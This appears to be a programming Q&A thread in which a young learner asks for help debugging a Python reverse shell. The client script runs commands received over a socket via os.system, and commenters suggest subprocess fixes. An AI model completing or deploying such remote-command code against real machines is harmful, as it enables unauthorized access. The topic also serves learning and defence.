# Im programming a reverse shell toll in python using socket and i get an error saying 'int' object has no attribute 'encode'

Tags: python, sockets

All of this is coded in python 3.8
This is my server script:

```
import socket
import os
from cmd_colorizer import colored

os.system("cls")

s = socket.socket()
host = socket.gethostname()
port = 8080
s.bind((host, port))
print(colored("[+] Server is running", "green"))
print(colored("[*] Waiting for connection...", "yellow"))
s.listen(1)
conn, addr = s.accept()
print(colored("[+] Shell established!", "green"))

while True:
    cmd = input(str("~#> "))

    if cmd == "exit":
        exit()
```

and this is my client script:

```
import socket
import os

os.system("cls")

s = socket.socket()
port = 8080
host = "DESKTOP-3EG5VR9"
s.connect((host, port))

while True:
    data = s.recv(1024).decode()
    redata = os.system(data)
    s.send(str(redata.encode()))
```

Im sorry if this is an stupid question im 12 and LEARNING python. Can anyone help?

Comment: [The return value of ``os.system`` is the exit code, not the output.](https://docs.python.org/3/library/os.html#os.system). Use [``subprocess.check_output``](https://docs.python.org/3/library/subprocess.html#subprocess.check_output) or ``subprocess.run`` instead.

Comment: so like what would the line of code be?

Comment: now im getting this error: 'bytes' object has no attribute 'encode'

Comment: ``encode`` is only needed to convert ``str`` to ``bytes``. By default, the ``subprocess`` functions will already return bytes.